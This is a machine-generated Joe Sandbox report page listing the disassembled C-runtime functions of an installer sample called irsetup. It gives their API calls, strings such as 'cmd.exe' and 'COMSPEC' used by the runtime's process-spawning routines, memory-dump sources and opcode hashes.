Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ErrorFreeHeapLast_errnofree
String ID:
API String ID: 3856698052-0
Opcode ID: 2acc962203dc7ae12ea3bb038dd3365208552806d81bcc30d1bb0bb085e2326a
Instruction ID: 24eefc2905acafd760541be8a1a1f06bbdc94ff17dd78c782732821f245c605b
Opcode Fuzzy Hash: 2acc962203dc7ae12ea3bb038dd3365208552806d81bcc30d1bb0bb085e2326a
Instruction Fuzzy Hash: 00C08C94F52F0E82DDAEE2A308D27F800C107AFBC0D80C420F80A8A380DC1CC3AB0B00

Non-executed Functions

Function 0000000180020C38 Relevance: 54.7, APIs: 26, Strings: 5, Instructions: 493COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000000180020C78

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180020CAA

Strings

/c , xrefs: 0000000180020F86, 0000000180020FD6
COMSPEC, xrefs: 0000000180020EAE
cmd.exe, xrefs: 0000000180020EEF
w, xrefs: 0000000180020DA0
PATH, xrefs: 00000001800210D3

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID: /c $COMSPEC$PATH$cmd.exe$w
API String ID: 2310398763-3679458415
Opcode ID: 500590a71f3528d87d2e0ac02872d3b0dafdd78488768c422d5b14c18cecb6bd
Instruction ID: 9f0d6bfb52196638ce6bad66fd6574380d9c8f482639ba9c857dbbd3f1092ba9
Opcode Fuzzy Hash: 500590a71f3528d87d2e0ac02872d3b0dafdd78488768c422d5b14c18cecb6bd
Instruction Fuzzy Hash: 4522B23220478886FBB7DB65A4517EEB391F78D7C4F548125BA8987B96CF38C649CB00

Function 0000000180032638 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 468COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 0000000180032689
_errno.LIBCMT ref: 0000000180032690

Strings

U, xrefs: 0000000180032C47

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID: U
API String ID: 921712934-4171548499
Opcode ID: 48a7f9feffc5bfc5e053856909e6f80eec15adabe95c1eaed7459d9126117ee3
Instruction ID: b99c78c3d65ca0191b994378c1241e68cd305618541e39d27e1f96f7d254ba1e
Opcode Fuzzy Hash: 48a7f9feffc5bfc5e053856909e6f80eec15adabe95c1eaed7459d9126117ee3
Instruction Fuzzy Hash: BF12B23221464986EBA38F25E4443EBB7A0F78C7C4F568116FA89477A5DF39C64DCB10

Function 0000000180037DC8 Relevance: 28.9, APIs: 19, Instructions: 377COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180037E3A
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180037E50
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180037EFA
malloc.LIBCMT ref: 0000000180037F6B
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180037FA2
LCMapStringW.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180037FC7
LCMapStringW.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180038017
malloc.LIBCMT ref: 000000018003806A
LCMapStringW.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 00000001800380A4
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 00000001800380E7
free.LIBCMT ref: 00000001800380F8
free.LIBCMT ref: 0000000180038106
LCMapStringA.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180038195
malloc.LIBCMT ref: 0000000180038203
LCMapStringA.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 000000018003824C
free.LIBCMT ref: 0000000180038294
LCMapStringA.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 00000001800382B4
free.LIBCMT ref: 00000001800382C6
free.LIBCMT ref: 00000001800382D8

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: String$free$ByteCharMultiWidemalloc$ErrorLast
String ID:
API String ID: 1837315383-0
Opcode ID: cacc80e21e0b7faa225b9fdaf443091b09f2c2604889e9d2f947d49bd1adc46f
Instruction ID: a7cd305ef16002d982a5c2a4af8f81cce234251d115d984bdccc4e66b87c68b2
Opcode Fuzzy Hash: cacc80e21e0b7faa225b9fdaf443091b09f2c2604889e9d2f947d49bd1adc46f
Instruction Fuzzy Hash: D8F19F32200B888AE7A78F25D4407DA77A1FB4CBE8F568615FA5957BD4DF38CB498700

Function 00000001800352F8 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018003532B

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018003536A
_errno.LIBCMT ref: 000000018003537A
_errno.LIBCMT ref: 000000018003539F
_errno.LIBCMT ref: 00000001800355AA
_errno.LIBCMT ref: 00000001800355B4
free.LIBCMT ref: 00000001800355C4
free.LIBCMT ref: 00000001800355D3

Strings

PATH, xrefs: 00000001800353C3

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$free$DecodePointer
String ID: PATH
API String ID: 3098740396-1036084923
Opcode ID: 7f8aa0d2bc419b7ac494ea42fc3385d60b1a286c2162d3fafcbbe687e9060918
Instruction ID: 9a3c46973cae5f37c669a60ded91cf3780b69c90c913b2de57871a32441f2394
Opcode Fuzzy Hash: 7f8aa0d2bc419b7ac494ea42fc3385d60b1a286c2162d3fafcbbe687e9060918
Instruction Fuzzy Hash: 0C711631201A8841FBE3AA2195617FF2382AB8D7D9F45C522FE9A077D6DE38C74D8701

Function 000000018003029C Relevance: 18.2, APIs: 12, Instructions: 211COMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00000001800302CD
_errno.LIBCMT ref: 00000001800302D4

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

__doserrno.LIBCMT ref: 0000000180030313
_errno.LIBCMT ref: 000000018003031A

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno$DecodePointer
String ID:
API String ID: 3911551546-0
Opcode ID: 552b4b0fef55a77f0b16bb130acd12287ff159c4b9a0ed71046dbff09db99d99
Instruction ID: 164ba2cb6b460aa59382b2c1d58f859bc5e2f64025dd1feaf38bdf79f172ba54
Opcode Fuzzy Hash: 552b4b0fef55a77f0b16bb130acd12287ff159c4b9a0ed71046dbff09db99d99
Instruction Fuzzy Hash: D591E232214A8882EB93DF65E4907EF7B61F3887D0F558116FA8907BA5CF78C548CB00

Function 000000018003A8E4 Relevance: 18.1, APIs: 12, Instructions: 115memoryfileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000180039400: _errno.LIBCMT ref: 0000000180039422

_errno.LIBCMT ref: 000000018003A96C

Part of subcall function 0000000180039400: SetFilePointer.KERNEL32(00000000,?,00000001,0000000180032E64,?,00000000,?,00000000,00000000,0000000180032611,?,?,%.14g,000000018002D5DA), ref: 0000000180039442
Part of subcall function 0000000180039400: GetLastError.KERNEL32(?,00000000,?,00000000,00000000,0000000180032611,?,?,%.14g,000000018002D5DA,?,?,00000200,000000018002E089), ref: 0000000180039451

GetProcessHeap.KERNEL32 ref: 000000018003A93E
HeapAlloc.KERNEL32 ref: 000000018003A953
_errno.LIBCMT ref: 000000018003A961
__doserrno.LIBCMT ref: 000000018003A9C6
_errno.LIBCMT ref: 000000018003A9D0
GetProcessHeap.KERNEL32 ref: 000000018003A9E9
HeapFree.KERNEL32 ref: 000000018003A9F7
SetEndOfFile.KERNEL32 ref: 000000018003AA22
_errno.LIBCMT ref: 000000018003AA39
__doserrno.LIBCMT ref: 000000018003AA44
GetLastError.KERNEL32 ref: 000000018003AA4C

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$Heap$ErrorFileLastProcess__doserrno$AllocFreePointer
String ID:
API String ID: 3112900366-0
Opcode ID: 1acf10fccda49597a569ff7a61e3d259f8e1ce3ac393ce0a89e29cdfbef2b00e
Instruction ID: 8eb280900b96f9cb44dac23b3b5a6d05d6d782666a4f137379f29f380706e389
Opcode Fuzzy Hash: 1acf10fccda49597a569ff7a61e3d259f8e1ce3ac393ce0a89e29cdfbef2b00e
Instruction Fuzzy Hash: 2E419F3530495846FAA7AB759D043EE7391A74EBF0F06C712BA79077D2DE38864A8701

Function 000000018003CD74 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 354COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018003CE28
__doserrno.LIBCMT ref: 000000018003CE33

Part of subcall function 000000018002649C: _lock.LIBCMT ref: 00000001800264BF
Part of subcall function 000000018002649C: _errno.LIBCMT ref: 00000001800264D1

free.LIBCMT ref: 000000018003CEF5
free.LIBCMT ref: 000000018003CFD4
_errno.LIBCMT ref: 000000018003CFDF
__doserrno.LIBCMT ref: 000000018003CFEA

Part of subcall function 000000018002BB84: RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
Part of subcall function 000000018002BB84: RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
Part of subcall function 000000018002BB84: RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
Part of subcall function 000000018002BB84: IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
Part of subcall function 000000018002BB84: SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
Part of subcall function 000000018002BB84: UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
Part of subcall function 000000018002BB84: GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
Part of subcall function 000000018002BB84: TerminateProcess.KERNEL32 ref: 000000018002BC9A

free.LIBCMT ref: 000000018003D212
free.LIBCMT ref: 000000018003D228

Strings

SystemRoot, xrefs: 000000018003CD97
cmd.exe, xrefs: 000000018003CD76, 000000018003CD77

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$_errno$ExceptionFilterProcessUnhandled__doserrno$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual_lock
String ID: SystemRoot$cmd.exe
API String ID: 2783816385-1915010242
Opcode ID: f435228b7c99033ebf9bbf731d6440864f99d1bda75eeee7b1c28e628a164daa
Instruction ID: 7d2aedf081fda9467836d831cf405406e94ff08d2ab400320d1a2de9d3ad4fb8
Opcode Fuzzy Hash: f435228b7c99033ebf9bbf731d6440864f99d1bda75eeee7b1c28e628a164daa
Instruction Fuzzy Hash: 44E1D03220568886EBA3DF25E5507EF6791F78DBC4F06C122FA4A97B95CF38C6498701

Function 000000018003779C Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00000001800377BE
GetUserDefaultLCID.KERNEL32(?,?,?,?,00000000,0000000180028F80), ref: 00000001800378BE
IsValidCodePage.KERNEL32(?,?,?,?,00000000,0000000180028F80), ref: 000000018003790F
IsValidLocale.KERNEL32(?,?,?,?,00000000,0000000180028F80), ref: 0000000180037925
GetLocaleInfoA.KERNEL32(?,?,?,?,00000000,0000000180028F80), ref: 00000001800379A0
GetLocaleInfoA.KERNEL32(?,?,?,?,00000000,0000000180028F80), ref: 00000001800379BD
_itow_s.LIBCMT ref: 00000001800379DB

Strings

Norwegian-Nynorsk, xrefs: 0000000180037960

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itow_s
String ID: Norwegian-Nynorsk
API String ID: 2273835618-461349085
Opcode ID: cd1b9dbfe264d746d2e8f6b4703a042a5d78dbd1592c6507181496ebb6678025
Instruction ID: 761428af2cddcf0ece5004559499aa7377a8e36176df394555f2b51de48901ed
Opcode Fuzzy Hash: cd1b9dbfe264d746d2e8f6b4703a042a5d78dbd1592c6507181496ebb6678025
Instruction Fuzzy Hash: 75616F7630078886FBB78F21D4453EA23A0E748BC8F1AC526EA4D467D6DF78CA49C351

Function 000000018002759C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 000000018002649C: _lock.LIBCMT ref: 00000001800264BF
Part of subcall function 000000018002649C: _errno.LIBCMT ref: 00000001800264D1

_errno.LIBCMT ref: 0000000180027624
_errno.LIBCMT ref: 000000018002762B
_errno.LIBCMT ref: 000000018002764D

Part of subcall function 000000018002BB84: RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
Part of subcall function 000000018002BB84: RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
Part of subcall function 000000018002BB84: RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
Part of subcall function 000000018002BB84: IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
Part of subcall function 000000018002BB84: SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
Part of subcall function 000000018002BB84: UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
Part of subcall function 000000018002BB84: GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
Part of subcall function 000000018002BB84: TerminateProcess.KERNEL32 ref: 000000018002BC9A

_errno.LIBCMT ref: 0000000180027656
_errno.LIBCMT ref: 0000000180027660
_errno.LIBCMT ref: 000000018002766A
free.LIBCMT ref: 0000000180027693

Strings

COMSPEC, xrefs: 00000001800275A9
cmd.exe, xrefs: 0000000180027671

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual_lockfree
String ID: COMSPEC$cmd.exe
API String ID: 3602565165-2256226045
Opcode ID: b887252e9a82ff158cc5d0f6a798b1d26206a4203a57b46acac22f2f10929cf5
Instruction ID: 68278e6952bb5676aa1c7e33abe437adcf0fbace9db24f0e263f771a66120287
Opcode Fuzzy Hash: b887252e9a82ff158cc5d0f6a798b1d26206a4203a57b46acac22f2f10929cf5
Instruction Fuzzy Hash: 51318732304B8882EB93AF68A4857DE7391B78D3C4F558126F64D43A96DF34C60CC701

Function 00000001800218A4 Relevance: 15.2, APIs: 10, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800218D2

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180021909

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID:
API String ID: 2310398763-0
Opcode ID: 8f3b6e9ff41334ba54332e6d1750106bbdce4b742fd25a8573c29cb5a3279734
Instruction ID: ad6dcca9d861f50b33ce47824bcecdfeea55456dd60a8eb5268593a212cc83da
Opcode Fuzzy Hash: 8f3b6e9ff41334ba54332e6d1750106bbdce4b742fd25a8573c29cb5a3279734
Instruction Fuzzy Hash: FC717031614A888AF7A7EB25E8517EA73A0B7A87C9F54C115FA49476D6DF38C60CCB00

Function 000000018002B938 Relevance: 15.1, APIs: 10, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 000000018002B961
_errno.LIBCMT ref: 000000018002B96A
__doserrno.LIBCMT ref: 000000018002B9BB
_errno.LIBCMT ref: 000000018002B9C2

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: d0536870306b69ef0be8a0b3515a67fa88222e8b226a91abf527962d6d50e32f
Instruction ID: 40da67c960e1d4e2372dec5a0354c409265d61eb1e7225161d37e6ada3604ed7
Opcode Fuzzy Hash: d0536870306b69ef0be8a0b3515a67fa88222e8b226a91abf527962d6d50e32f
Instruction Fuzzy Hash: 9C414832610A8886E7A3AF75A8427EE3755B7897E0F55C61ABB64477D3CE38C608C701

Function 0000000180027EB0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 407timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeFormatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,0000000180027C40), ref: 0000000180027FA0
malloc.LIBCMT ref: 0000000180027FF9
GetTimeFormatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,0000000180027C40), ref: 0000000180028035
free.LIBCMT ref: 0000000180028072
__ascii_stricmp.LIBCMT ref: 0000000180028109

Strings

am/pm, xrefs: 00000001800280FF
a/p, xrefs: 0000000180028161

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: FormatTime$__ascii_stricmpfreemalloc
String ID: a/p$am/pm
API String ID: 712559314-3206640213
Opcode ID: 500c3b125aa916a9b4889e827686677fef4752b90ac516746913604bc946489c
Instruction ID: cbe2ce431d5da5b9a7fad71b520a7281152b650febbd3d5ef3e97f1e640e6aa6
Opcode Fuzzy Hash: 500c3b125aa916a9b4889e827686677fef4752b90ac516746913604bc946489c
Instruction Fuzzy Hash: FBF1CD3A216698C6E7E7CF2484503ED67A1FB0DBC4F48D102FA8557A86DE398B5DE301

Function 000000018002F154 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 137fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,?,?,00000001,000000018002F3B0,?,?,?,?,000000018002D415,?,?,00000000,000000018002BF80), ref: 000000018002F217
GetStdHandle.KERNEL32(?,?,?,?,00000001,000000018002F3B0,?,?,?,?,000000018002D415,?,?,00000000,000000018002BF80), ref: 000000018002F323
WriteFile.KERNEL32 ref: 000000018002F35D

Strings

<program name unknown>, xrefs: 000000018002F221
Runtime Error!Program: , xrefs: 000000018002F1D6
..., xrefs: 000000018002F27A
Microsoft Visual C++ Runtime Library, xrefs: 000000018002F307

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: b197fd75b0bf504f15cb967d186853a3546cccada686d32beca6375f3c352b6e
Instruction ID: 74dce0a69e53e3faa34f58e3e1ea06bdb026180a8ddaf6cfecd4a031f9f463fb
Opcode Fuzzy Hash: b197fd75b0bf504f15cb967d186853a3546cccada686d32beca6375f3c352b6e
Instruction Fuzzy Hash: 6651BD32200A4991FBB7D721A9957FA2395B78D7D8F44C52AB94982BD9CF38C30D8304

Function 0000000180030014 Relevance: 12.2, APIs: 8, Instructions: 192COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000000180030038

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180030064

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID:
API String ID: 2310398763-0
Opcode ID: 83723b4061026842c1002c17d67710934d330cb8e075b7ab162c63b928ae4f1c
Instruction ID: 4870327f923fffb19be7d4a8fd62541ede676502e6ed6a30b25f36a9472d912a
Opcode Fuzzy Hash: 83723b4061026842c1002c17d67710934d330cb8e075b7ab162c63b928ae4f1c
Instruction Fuzzy Hash: B2710772A1629C42F7FB9AB59835BEF2781A38D7C4F66C505BA4542AC2CF7C87088700

Function 000000018003A584 Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A5DE
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A5F0
GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A63B
malloc.LIBCMT ref: 000000018003A6A0

Part of subcall function 000000018002D3E0: _FF_MSGBANNER.LIBCMT ref: 000000018002D410
Part of subcall function 000000018002D3E0: HeapAlloc.KERNEL32(?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5), ref: 000000018002D435
Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D459
Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D464

GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A6CD
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A707
free.LIBCMT ref: 000000018003A71B
GetLocaleInfoA.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A731

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

